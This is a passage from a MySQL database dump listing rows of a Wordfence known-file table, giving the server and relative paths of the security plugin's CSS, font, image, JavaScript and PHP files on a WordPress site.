(210, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png', 'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),
(211, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/iptraf.1712157296.css', 'wp-content/plugins/wordfence/css/iptraf.1712157296.css'),
(212, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1712157296.css', 'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1712157296.css'),
(213, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.min.1712157296.css', 'wp-content/plugins/wordfence/css/jquery-ui.min.1712157296.css'),
(214, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.structure.min.1712157296.css', 'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1712157296.css'),
(215, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.theme.min.1712157296.css', 'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1712157296.css'),
(216, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/care-global.1712157296.css', 'wp-content/plugins/wordfence/css/license/care-global.1712157296.css'),
(217, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/care.1712157296.css', 'wp-content/plugins/wordfence/css/license/care.1712157296.css'),
(218, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/free-global.1712157296.css', 'wp-content/plugins/wordfence/css/license/free-global.1712157296.css'),
(219, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/free.1712157296.css', 'wp-content/plugins/wordfence/css/license/free.1712157296.css'),
(220, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/premium-global.1712157296.css', 'wp-content/plugins/wordfence/css/license/premium-global.1712157296.css'),
(221, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/premium.1712157296.css', 'wp-content/plugins/wordfence/css/license/premium.1712157296.css'),
(222, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response-global.1712157296.css', 'wp-content/plugins/wordfence/css/license/response-global.1712157296.css'),
(223, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response-variables.1712157296.css', 'wp-content/plugins/wordfence/css/license/response-variables.1712157296.css'),
(224, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/response.1712157296.css', 'wp-content/plugins/wordfence/css/license/response.1712157296.css'),
(225, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/main.1712157296.css', 'wp-content/plugins/wordfence/css/main.1712157296.css'),
(226, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/phpinfo.1712157296.css', 'wp-content/plugins/wordfence/css/phpinfo.1712157296.css'),
(227, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-adminbar.1712157296.css', 'wp-content/plugins/wordfence/css/wf-adminbar.1712157296.css'),
(228, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-colorbox.1712157296.css', 'wp-content/plugins/wordfence/css/wf-colorbox.1712157296.css'),
(229, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-font-awesome.1712157296.css', 'wp-content/plugins/wordfence/css/wf-font-awesome.1712157296.css'),
(230, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-global.1712157296.css', 'wp-content/plugins/wordfence/css/wf-global.1712157296.css'),
(231, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-ionicons.1712157296.css', 'wp-content/plugins/wordfence/css/wf-ionicons.1712157296.css'),
(232, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-onboarding.1712157296.css', 'wp-content/plugins/wordfence/css/wf-onboarding.1712157296.css'),
(233, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wf-roboto-font.1712157296.css', 'wp-content/plugins/wordfence/css/wf-roboto-font.1712157296.css'),
(234, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wfselect2.min.1712157296.css', 'wp-content/plugins/wordfence/css/wfselect2.min.1712157296.css'),
(235, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/wordfenceBox.1712157296.css', 'wp-content/plugins/wordfence/css/wordfenceBox.1712157296.css'),
(236, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff', 'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),
(237, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/ionicons.woff', 'wp-content/plugins/wordfence/fonts/ionicons.woff'),
(238, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),
(239, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),
(240, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),
(241, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),
(242, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),
(243, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),
(244, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),
(245, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),
(246, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),
(247, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff', 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),
(248, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa-whole.svg', 'wp-content/plugins/wordfence/images/2fa-whole.svg'),
(249, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa1.svg', 'wp-content/plugins/wordfence/images/2fa1.svg'),
(250, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/2fa2.svg', 'wp-content/plugins/wordfence/images/2fa2.svg'),
(251, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/back_disabled.jpg', 'wp-content/plugins/wordfence/images/back_disabled.jpg'),
(252, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/back_enabled.jpg', 'wp-content/plugins/wordfence/images/back_enabled.jpg'),
(253, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/blocking.svg', 'wp-content/plugins/wordfence/images/blocking.svg'),
(254, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/button-grad-grey.png', 'wp-content/plugins/wordfence/images/button-grad-grey.png'),
(255, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/checkbox.png', 'wp-content/plugins/wordfence/images/checkbox.png'),
(256, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/flags.png', 'wp-content/plugins/wordfence/images/flags.png'),
(257, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/forward_disabled.jpg', 'wp-content/plugins/wordfence/images/forward_disabled.jpg'),
(258, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/forward_enabled.jpg', 'wp-content/plugins/wordfence/images/forward_enabled.jpg'),
(259, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/help.png', 'wp-content/plugins/wordfence/images/help.png'),
(260, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajax24.gif', 'wp-content/plugins/wordfence/images/icons/ajax24.gif'),
(261, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajax3.gif', 'wp-content/plugins/wordfence/images/icons/ajax3.gif'),
(262, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),
(263, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxScan.gif', 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),
(264, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif', 'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif');
INSERT INTO `wpou_wfknownfilelist` VALUES
(265, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/arrow_refresh.png', 'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),
(266, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/bullet_yellow.png', 'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),
(267, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-care.svg', 'wp-content/plugins/wordfence/images/icons/check-care.svg'),
(268, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-premium.svg', 'wp-content/plugins/wordfence/images/icons/check-premium.svg'),
(269, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check-response.svg', 'wp-content/plugins/wordfence/images/icons/check-response.svg'),
(270, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/check.svg', 'wp-content/plugins/wordfence/images/icons/check.svg'),
(271, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/email_go.png', 'wp-content/plugins/wordfence/images/icons/email_go.png'),
(272, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/error128.png', 'wp-content/plugins/wordfence/images/icons/error128.png'),
(273, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/magnifier.png', 'wp-content/plugins/wordfence/images/icons/magnifier.png'),
(274, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/tick128.png', 'wp-content/plugins/wordfence/images/icons/tick128.png'),
(275, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/warning128.png', 'wp-content/plugins/wordfence/images/icons/warning128.png'),
(276, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/icons/working-indicator.gif', 'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),
(277, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/lightbox-controls.png', 'wp-content/plugins/wordfence/images/lightbox-controls.png'),
(278, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading.gif', 'wp-content/plugins/wordfence/images/loading.gif'),
(279, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading_background.png', 'wp-content/plugins/wordfence/images/loading_background.png'),
(280, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/loading_large.gif', 'wp-content/plugins/wordfence/images/loading_large.gif'),
(281, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logo.png', 'wp-content/plugins/wordfence/images/logo.png'),
(282, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-care.svg', 'wp-content/plugins/wordfence/images/logos/shield-care.svg'),
(283, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-free.svg', 'wp-content/plugins/wordfence/images/logos/shield-free.svg'),
(284, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-premium.svg', 'wp-content/plugins/wordfence/images/logos/shield-premium.svg'),
(285, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-response.svg', 'wp-content/plugins/wordfence/images/logos/shield-response.svg'),
(286, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/logos/shield-white.svg', 'wp-content/plugins/wordfence/images/logos/shield-white.svg'),
(287, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/options.svg', 'wp-content/plugins/wordfence/images/options.svg'),
(288, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/ratelimiting.svg', 'wp-content/plugins/wordfence/images/ratelimiting.svg'),
(289, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc.gif', 'wp-content/plugins/wordfence/images/sort_asc.gif'),
(290, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc.png', 'wp-content/plugins/wordfence/images/sort_asc.png'),
(291, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc_disabled.gif', 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),
(292, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc_disabled.png', 'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),
(293, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_both.gif', 'wp-content/plugins/wordfence/images/sort_both.gif'),
(294, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_both.png', 'wp-content/plugins/wordfence/images/sort_both.png'),
(295, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc.gif', 'wp-content/plugins/wordfence/images/sort_desc.gif'),
(296, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc.png', 'wp-content/plugins/wordfence/images/sort_desc.png'),
(297, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc_disabled.gif', 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),
(298, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc_disabled.png', 'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),
(299, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/support.svg', 'wp-content/plugins/wordfence/images/support.svg'),
(300, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/tools.svg', 'wp-content/plugins/wordfence/images/tools.svg'),
(301, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-central-logo.svg', 'wp-content/plugins/wordfence/images/wf-central-logo.svg'),
(302, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-error-badge.svg', 'wp-content/plugins/wordfence/images/wf-error-badge.svg'),
(303, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-horizontal.svg', 'wp-content/plugins/wordfence/images/wf-horizontal.svg'),
(304, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wordfence-logo.svg', 'wp-content/plugins/wordfence/images/wordfence-logo.svg'),
(305, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/index.php', 'wp-content/plugins/wordfence/index.php'),
(306, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.1712157296.js', 'wp-content/plugins/wordfence/js/admin.1712157296.js'),
(307, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.ajaxWatcher.1712157296.js', 'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1712157296.js'),
(308, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.liveTraffic.1712157296.js', 'wp-content/plugins/wordfence/js/admin.liveTraffic.1712157296.js'),
(309, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/chart.umd.1712157296.js', 'wp-content/plugins/wordfence/js/chart.umd.1712157296.js'),
(310, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/date.1712157296.js', 'wp-content/plugins/wordfence/js/date.1712157296.js'),
(311, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1712157296.js', 'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1712157296.js'),
(312, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.colorbox-min.1712157296.js', 'wp-content/plugins/wordfence/js/jquery.colorbox-min.1712157296.js'),
(313, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.colorbox.1712157296.js', 'wp-content/plugins/wordfence/js/jquery.colorbox.1712157296.js'),
(314, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.qrcode.min.1712157296.js', 'wp-content/plugins/wordfence/js/jquery.qrcode.min.1712157296.js'),
(315, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.tmpl.min.1712157296.js', 'wp-content/plugins/wordfence/js/jquery.tmpl.min.1712157296.js'),
(316, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/knockout-3.5.1.1712157296.js', 'wp-content/plugins/wordfence/js/knockout-3.5.1.1712157296.js'),
(317, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfdashboard.1712157296.js', 'wp-content/plugins/wordfence/js/wfdashboard.1712157296.js'),
(318, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfdropdown.1712157296.js', 'wp-content/plugins/wordfence/js/wfdropdown.1712157296.js'),
(319, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfglobal.1712157296.js', 'wp-content/plugins/wordfence/js/wfglobal.1712157296.js'),
(320, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfi18n.1712157296.js', 'wp-content/plugins/wordfence/js/wfi18n.1712157296.js'),
(321, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfonboarding.1712157296.js', 'wp-content/plugins/wordfence/js/wfonboarding.1712157296.js'),
(322, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfpopover.1712157296.js', 'wp-content/plugins/wordfence/js/wfpopover.1712157296.js'),
(323, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfselect2.min.1712157296.js', 'wp-content/plugins/wordfence/js/wfselect2.min.1712157296.js'),
(324, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/languages/wordfence.mo', 'wp-content/plugins/wordfence/languages/wordfence.mo'),
(325, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/languages/wordfence.pot', 'wp-content/plugins/wordfence/languages/wordfence.pot'),
(326, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/.htaccess', 'wp-content/plugins/wordfence/lib/.htaccess'),
(327, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),
(328, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),
(329, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),
(330, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php', 'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),
(331, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff.php', 'wp-content/plugins/wordfence/lib/Diff.php'),
(332, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb', 'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),
(333, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/IPTraf.php', 'wp-content/plugins/wordfence/lib/IPTraf.php'),
(334, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/IPTrafList.php', 'wp-content/plugins/wordfence/lib/IPTrafList.php'),
(335, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php', 'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),
(336, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/compat.php', 'wp-content/plugins/wordfence/lib/compat.php'),
(337, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),
(338, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),
(339, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),
(340, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_countries.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),
(341, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_ips.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),
(342, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),
(343, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_logins.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),
(344, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),
(345, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php', 'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),
(346, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/diffResult.php', 'wp-content/plugins/wordfence/lib/diffResult.php'),
(347, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_genericAlert.php', 'wp-content/plugins/wordfence/lib/email_genericAlert.php'),
(348, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_newIssues.php', 'wp-content/plugins/wordfence/lib/email_newIssues.php'),
(349, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_unlockRequest.php', 'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),
(350, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php', 'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),
(351, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/flags.php', 'wp-content/plugins/wordfence/lib/flags.php'),
(352, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/live_activity.php', 'wp-content/plugins/wordfence/lib/live_activity.php'),
(353, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_dashboard.php', 'wp-content/plugins/wordfence/lib/menu_dashboard.php'),
(354, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_dashboard_options.php', 'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),
(355, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall.php', 'wp-content/plugins/wordfence/lib/menu_firewall.php'),
(356, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking.php', 'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),
(357, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php', 'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),
(358, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_waf.php', 'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),
(359, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php', 'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),
(360, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_install.php', 'wp-content/plugins/wordfence/lib/menu_install.php'),
(361, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_options.php', 'wp-content/plugins/wordfence/lib/menu_options.php'),
(362, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner.php', 'wp-content/plugins/wordfence/lib/menu_scanner.php'),
(363, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner_credentials.php', 'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),
(364, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner_options.php', 'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),
(365, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_support.php', 'wp-content/plugins/wordfence/lib/menu_support.php'),
(366, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools.php', 'wp-content/plugins/wordfence/lib/menu_tools.php'),
(367, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php', 'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),
(368, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_importExport.php', 'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),
(369, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php', 'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),
(370, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php', 'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),
(371, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_whois.php', 'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),
(372, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_wordfence_central.php', 'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),
(373, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/noc1.key', 'wp-content/plugins/wordfence/lib/noc1.key'),
(374, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),
(375, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),
(376, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),
(377, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),
(378, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/sodium_compat_fast.php', 'wp-content/plugins/wordfence/lib/sodium_compat_fast.php'),
(379, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/sysinfo.php', 'wp-content/plugins/wordfence/lib/sysinfo.php'),
(380, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/viewFullActivityLog.php', 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),
(381, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wf503.php', 'wp-content/plugins/wordfence/lib/wf503.php'),
(382, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfAPI.php', 'wp-content/plugins/wordfence/lib/wfAPI.php'),
